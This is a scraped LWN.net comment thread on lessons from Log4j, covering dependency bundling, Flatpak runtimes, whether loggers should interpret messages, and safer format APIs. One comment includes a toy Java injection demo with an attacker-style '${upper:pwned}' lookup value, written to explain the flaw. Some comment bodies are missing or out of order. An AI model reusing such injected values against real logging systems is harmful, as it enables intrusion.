[Link] (1 responses)
I agree, though: build systems really do need to support unbundling. Java build systems in particular are a nightmare; some make autotools look genuinely simple and pleasant!
Posted Dec 17, 2021 16:47 UTC (Fri)
by seyman (subscriber, #1172)
[Link]
It would be great if applications that package dependencies could include a MANIFEST-like file that documents their dependencies. For each one, it could state what version is bundled, whether it has been modified from upstream's version, and why it is bundled.
That alone would be a huge step forwards.
Posted Dec 17, 2021 8:12 UTC (Fri)
by nirbheek (subscriber, #54111)
[Link] (6 responses)
So if you install 5 apps using rpm and 10 apps with Flatpak, you will only have two copies of a library — except if an app requires an older runtime for compatibility reasons, but that's not a new problem.
Posted Dec 17, 2021 9:14 UTC (Fri)
by z3ntu (subscriber, #117661)
[Link] (2 responses)
Posted Dec 17, 2021 14:23 UTC (Fri)
by nirbheek (subscriber, #54111)
[Link] (1 responses)
For things like libssh2, I would want Flatpak / Flathub to have a system for checking whether multiple apps on the repo have the same dependency, so that it can either be added to an existing runtime, or a new runtime can be created that contains it. It might already have such a system, since it's easy to automatically detect it from the app manifests.
Posted Dec 17, 2021 16:48 UTC (Fri)
by nim-nim (subscriber, #34454)
[Link]
One man’s esoteric dependency is another’s must-have.
The JVM is the archetypal runtime: it bundles all kinds of features so that Java devs need not use any esoteric dependency. Fast forward a few decades, and Java devs use everything except what is bundled (log4j is not the sole example).
The batteries-included runtime model only works at first, when it is new and shiny and app-dev interests are perfectly aligned with runtime-dev interests (mainly because there is nothing but the runtime to choose from).
Over time, runtime devs become reluctant to deprecate runtime parts (because of the installed base), and they clash with people proposing alternatives (because they, as official runtime devs, know best), so there is a natural drift of app devs towards “esoteric” runtime alternatives.
The ultimate result of a successful runtime is lots of people using esoteric deps (aka runtime alternatives). And that result is better served by a granular dependency system, not a batteries-included model that posits perfect runtime-dev and app-dev alignment in the long run.
That’s not a reflection on specific human beings; that’s how we behave in general.
Posted Dec 17, 2021 10:40 UTC (Fri)
by zdzichu (subscriber, #17118)
[Link] (2 responses)
Posted Dec 17, 2021 12:12 UTC (Fri)
by atnot (subscriber, #124910)
[Link] (1 responses)
Posted Dec 18, 2021 21:45 UTC (Sat)
by JanC_ (guest, #34940)
[Link]
It’s basically just insane to keep filling up disk space with (often unused!) runtimes.
Posted Dec 19, 2021 15:40 UTC (Sun)
by Herve5 (subscriber, #115399)
[Link]
Posted Dec 16, 2021 21:20 UTC (Thu)
by ibukanov (subscriber, #3942)
[Link] (2 responses)
Posted Dec 17, 2021 5:33 UTC (Fri)
by joib (subscriber, #8541)
[Link] (1 responses)
Posted Dec 18, 2021 23:06 UTC (Sat)
by gfernandes (subscriber, #119910)
[Link]
Needless to say, Logback is not vulnerable in the same way.
Posted Dec 17, 2021 7:07 UTC (Fri)
by iabervon (subscriber, #722)
[Link] (3 responses)
Posted Dec 17, 2021 23:52 UTC (Fri)
by tialaramex (subscriber, #21167)
[Link] (2 responses)
A month ago, Apache Log4j2's documentation proudly explained that lookups, including recursive lookups, were a great feature and that, although a mechanism was provided to turn them off, you should think twice before doing so. When 2.15.0 shipped that was gone, and the documentation explained what was true all along: that this is incredibly dangerous and you shouldn't do it, but it was available if you needed it. I assume this was further refined for 2.16.0. If you're wondering what it used to look like, check the Wayback Machine as I did.
Java thinks the variable userName I got from my HTTP endpoint and the string literal "User {} not found" are the exact same kind of thing: Strings. So even if they told Java developers not to write log(userDefinedValues), they couldn't put any force behind such a requirement. And since the rest of Java lacks format handling, it's pretty usual for Java programmers to write ("stuff" + like + " " + this) or, if they're more disciplined, use a StringBuilder to reduce the allocation overhead, both of which ensure that even if you pretend your interface is log(format, param1, param2, param3), it's always used as log(userDefinedValues) anyway, because the user smashes everything into a single String before even trying to log it.
As I understand it, in Swift you can say that a parameter must be a string literal, and when the programmer tries log(userDefinedValues) that doesn't compile because the type doesn't match. In Rust you can't do that, but they luck out because their formatting is built out of macros, and so the *macro* language needs to parse the format, which must happen at compile time; as a result, format!(userDefinedValues) won't compile, whereas format!("{}", userDefinedValues) does what you want and isn't confused by whatever is in userDefinedValues at runtime.
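A toy model can make the ordering issue concrete. Everything below is invented for illustration (a ${upper:...} lookup stands in for the real ${jndi:...} lookups; none of this is Log4j's actual API): the dangerous behavior comes from running lookups on the *assembled* message, while running them only on the literal format string leaves parameters as inert data.

```java
import java.util.Locale;

// Toy model of the Log4j lookup problem; all names are illustrative.
public class LookupDemo {
    // Expand ${upper:x} -> X, our stand-in for a "lookup".
    static String expandLookups(String s) {
        StringBuilder out = new StringBuilder();
        int i = 0;
        while (i < s.length()) {
            int start = s.indexOf("${upper:", i);
            if (start < 0) { out.append(s.substring(i)); break; }
            int end = s.indexOf('}', start);
            if (end < 0) { out.append(s.substring(i)); break; }
            out.append(s, i, start);
            out.append(s.substring(start + 8, end).toUpperCase(Locale.ROOT));
            i = end + 1;
        }
        return out.toString();
    }

    // Substitute {} placeholders with arguments, verbatim.
    static String substitute(String format, Object... args) {
        StringBuilder out = new StringBuilder();
        int argIndex = 0;
        for (int i = 0; i < format.length(); ) {
            if (format.startsWith("{}", i) && argIndex < args.length) {
                out.append(args[argIndex++]);
                i += 2;
            } else {
                out.append(format.charAt(i++));
            }
        }
        return out.toString();
    }

    // Vulnerable order: lookups run on the assembled message, so
    // attacker-supplied parameters get interpreted too.
    static String naiveLog(String format, Object... args) {
        return expandLookups(substitute(format, args));
    }

    // Safer order: lookups run only on the literal format string;
    // parameters are inserted afterwards as inert data.
    static String saferLog(String format, Object... args) {
        return substitute(expandLookups(format), args);
    }

    public static void main(String[] args) {
        String attacker = "${upper:pwned}"; // attacker-controlled input
        System.out.println(naiveLog("User {} not found", attacker)); // User PWNED not found
        System.out.println(saferLog("User {} not found", attacker)); // User ${upper:pwned} not found
    }
}
```

In the vulnerable order the attacker-controlled parameter is expanded; in the safer order it passes through verbatim. Note that concatenating user data into the format string defeats even the safer order, which is tialaramex's point above.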
Posted Dec 18, 2021 7:13 UTC (Sat)
by iabervon (subscriber, #722)
[Link]
It looks like there was a suggested feature of configuring your output layout to include looking things up in a context, and this was also insecure due to the recursive nature of lookups, but that wasn't the default configuration problem that's hitting everything that used log4j2.
Posted Dec 24, 2021 7:34 UTC (Fri)
by spigot (subscriber, #50709)
[Link]
Posted Dec 17, 2021 15:54 UTC (Fri)
by nim-nim (subscriber, #34454)
[Link] (10 responses)
Any semi-useful logging system will do that. The data produced by the logger is minimal (logging is expensive); you need to complete it with something else for it to be useful; you cannot defer the completing, because that something else's state also changes over time; and completing requires some parsing of the data being completed.
That was already the case for paper sailors' logs: sailors would log all kinds of things (such as weather) in addition to their own decisions, and the logs would link all that data (interpret things).
Log4j’s failure is not in interpreting logged data. Log4j’s failure is first in failing to sanitize logged data before interpreting it, and second in accepting non-vetted external third-party code to do the interpreting.
Posted Dec 17, 2021 17:16 UTC (Fri)
by MarcB (guest, #101804)
[Link] (6 responses)
Usually a logging system will have the raw message, some additional static information (like severity) and some dynamic information (like timestamp, scope, PID, ...). All of this is inherently trustworthy.
The root cause of this mess is that Log4j went further and actually started interpreting the raw data. If there is any lesson to be learned here, it is "respect complexity".
Posted Dec 18, 2021 17:51 UTC (Sat)
by nim-nim (subscriber, #34454)
[Link] (5 responses)
Pretty much every time some info is replaced by expanded values or compared with some other info source (user name instead of user id, FQDN instead of IP, numeric timestamp with full local time, outcome of processing node A with outcome of processing node B).
The raw local numeric values the logger process captures are not terribly useful as-is.
The only thing that changes is the amount of parsing and reprocessing (see also syslog pipelines, this was not invented yesterday).
Posted Dec 18, 2021 23:10 UTC (Sat)
by gfernandes (subscriber, #119910)
[Link]
Posted Dec 20, 2021 9:32 UTC (Mon)
by MarcB (guest, #101804)
[Link] (3 responses)
But that should never be parsed from the log message. The IP address or user ID is already known to the logging application and is then mapped via some pre-configured mechanism.
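As a sketch of that idea (all names and the lookup table are hypothetical), enrichment draws only on data the application already holds; the message text itself is never inspected or expanded:

```java
import java.util.Map;

// Sketch: enrich a log record from a trusted, pre-configured source,
// not by parsing anything out of the message text. Names are illustrative.
public class Enricher {
    static final Map<Integer, String> USERS = Map.of(1001, "alice", 1002, "bob");

    static String logLine(int userId, String event) {
        // The mapping comes from application state; 'event' is appended verbatim.
        String name = USERS.getOrDefault(userId, "unknown");
        return "uid=" + userId + " (" + name + ") " + event;
    }

    public static void main(String[] args) {
        System.out.println(logLine(1001, "login failed")); // uid=1001 (alice) login failed
    }
}
```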
Posted Dec 20, 2021 10:07 UTC (Mon)
by nim-nim (subscriber, #34454)
[Link] (2 responses)
In more complex setups the bit that manipulates some data has no need to understand some of this data, but you still want the logs to expand it, because analysing problems needs more context.
So quite often logged data goes through some processing which the logged bit of code has no need of itself. People may hide this processing in another part of the app, in a third party lib, in plugins or even by invoking third-party executables shell-mode (all of those things may make remote network calls BTW). But this processing exists.
It’s the historical default *nix approach, BTW: unstructured logging with lots of reprocessing came before structured logs that force the log emitter to put its data into order (more) directly.
Posted Dec 20, 2021 15:04 UTC (Mon)
by MarcB (guest, #101804)
[Link] (1 responses)
And yes, ideally you would create structured logs - precisely to avoid having to parse the raw log message. Parsing unstructured logs is only acceptable if there is no better solution; i.e. when you cannot adjust the logging application. For a library like log4j - which is generating the logs in the first place - it makes no sense whatsoever.
For our in-house applications we have long since switched to a dual logging approach: classic unstructured logs stored locally and structured logs sent to logging infrastructure. The local logs would only be relevant in the (so far hypothetical) scenario of a major infrastructure outage.
Posted Dec 20, 2021 18:14 UTC (Mon)
by nim-nim (subscriber, #34454)
[Link]
The massaging is not an exception and would not exist without choices made logger-side.
Posted Dec 17, 2021 17:23 UTC (Fri)
by smurf (subscriber, #17840)
[Link] (2 responses)
Wrong. It's RANDOM EXTERNAL DATA. There is no freakin' POINT in even TRYING to interpret ANY of it.
Sorry for shouting, but … is this really that hard to comprehend?
(In a sane world we would be 20 years past the obvious "well, obviously yes since log4j stepped into that one" answer …)
Posted Dec 18, 2021 18:19 UTC (Sat)
by nim-nim (subscriber, #34454)
[Link]
A raw unfiltered copy of external data is not a log, it’s a capture (one that will be interpreted by the capture viewer, because raw data is useless as-is).
As with any processing of externally supplied data you need to check how the code that processes this data could be abused and sanitize the external data against it. That’s where log4j failed (in a gross way).
Posted Dec 21, 2021 11:46 UTC (Tue)
by k8to (guest, #15413)
[Link]
From the perspective of a logging system, the text being logged is not something that should be "operated upon". That should be explicitly avoided.
Sanitization is never anywhere near as safe as simply not processing the data computationally at all.
The only thing you usually want to do to "sanitize" data in a logging system is make some decisions about how to handle really unexpected cases, like requests to log giant things such as hundreds of kilobytes of data. Most logging systems simply truncate these after any formatting, or try to be clever and avoid unnecessary format building if the result will be unnecessarily large. But this is really just a subset of the "formatting" task, i.e., placing various data blobs into the logged item. It is by no means necessary to take the data blobs and perform any computational tasks beyond "turn into string".
In a sane logging system and language, "turn into string" is not something that can trigger unexpected call paths.
Posted Dec 18, 2021 20:07 UTC (Sat)
by linuxjacques (subscriber, #45768)
[Link]
it's even on the Ingenuity helicopter on Mars
How credible are the images from Ingenuity now?
Where is Perseverance going?
;)
Lessons from Log4j
Thus, at that time, there were few vulnerable packages available for free download and use, so every project had to code up its own security bugs. The community rose to the challenge and, even in those more innocent days, security problems were in anything but short supply.
Also companies: "We will never contribute any code or money to your project"
Standing on the fragile shoulders of giants
I can't get past this thought. Arguably the problem *is* that log4j treats logged strings as anything other than dead data to log, but a common pattern involves anonymous functions streaming to a StringBuilder inside the logging method. When that's allowable, the community is unwittingly enabling a culture where you *can* follow this pattern, so nobody trains StackOverflow with answers on why it's a bad idea to follow it.
There is some misinformation running around that newer versions of the JVM "fix" the problem through changing the defaults for com.sun.jndi.cosnaming.object.trustURLCodebase and com.sun.jndi.rmi.object.trustURLCodebase. Those protections are incomplete, depending on the application and its dependencies. For example, the XBean BeanFactory that is bundled with Tomcat is a known attack vector when combined with the Log4j problems, even when you are running on the latest JVMs with the more secure defaults. Ref: https://www.openwall.com/lists/oss-security/2021/12/10/2
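For defense in depth, those system properties can be pinned explicitly rather than left to JVM defaults. A sketch (keeping in mind, per the above, that this is not a complete mitigation, and that the properties must be set before any JNDI use):

```java
// Sketch: explicitly pin the JNDI trustURLCodebase properties to "false"
// instead of relying on JVM-version-dependent defaults.
public class JndiHardening {
    static final String[] PROPS = {
        "com.sun.jndi.ldap.object.trustURLCodebase",
        "com.sun.jndi.rmi.object.trustURLCodebase",
        "com.sun.jndi.cosnaming.object.trustURLCodebase",
    };

    public static void main(String[] args) {
        for (String p : PROPS) {
            System.setProperty(p, "false"); // belt and braces; run before any JNDI use
            System.out.println(p + "=" + System.getProperty(p));
        }
    }
}
```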
Dependency bundling
(2) Because if you're young (and "foolish") you don't understand the concept.
(3) Because if you haven't been burnt you don't see the point.
And, rather importantly
(4) if you're a manager it's someone else's problem...
Wol
> Bonus points if you can do it without the kneejerk CADT response.
> IMHO that doesn't count as "bundling" because, in most cases, at least on modern systems, the thing that is bundled is a binary blob self-extracting installer you got from upstream, and you are in no way allowed to just install random DLLs into your Program Files directory.
> Yeah, and then you have a library linked against FooLib 3.2, another library using FooLib 3.3, and no way to prevent these two from stepping on each others' toes when you try using them in the same application.
> If they get acquired by a large company, the biggest M&A risk is that they will have to do a major refactor or even rewrite in order to fix that mess.
> Build your production software on a platform that has support.
I hope that after these fires have been put out we all sit down and have a serious re-think about the downside of bundling dependencies.
With Flatpak, after some time, you will have more copies of the library. Because there is apparently no garbage collection of old runtimes:
Fedora Platform org.fedoraproject.Platform 34 f34 fedora system
Fedora Platform org.fedoraproject.Platform 35 f35 fedora system
Freedesktop Platf… org.freedesktop.Platform 20.08.15 20.08 flathub system
Freedesktop Platf… org.freedesktop.Platform 21.08.4 21.08 flathub system
Mesa …eedesktop.Platform.GL.default 21.1.7 20.08 flathub system
Mesa …eedesktop.Platform.GL.default 21.2.2 21.08 flathub system
Intel …edesktop.Platform.VAAPI.Intel 20.08 flathub system
Intel …edesktop.Platform.VAAPI.Intel 21.08 flathub system
ffmpeg-full …edesktop.Platform.ffmpeg-full 20.08 flathub system
ffmpeg-full …edesktop.Platform.ffmpeg-full 21.08 flathub system
GNOME Application… org.gnome.Platform 3.38 flathub system
GNOME Application… org.gnome.Platform 40 flathub system
GNOME Application… org.gnome.Platform 41 flathub system
Of course, unused runtimes are not a threat; they only occupy disk space.
snaps & flatpaks...
My thoughts exactly...
Check the Wayback Machine
Interestingly, in late November JEP draft: Templated Strings and Template Policies (Preview) was updated.
As one of its goals it lists:
Hopefully the Log4j 2 incident will provide an impetus for this work.
None of this even requires looking at the raw message. All a sane log system will do is enforce some limits on it (size, output encoding, ...).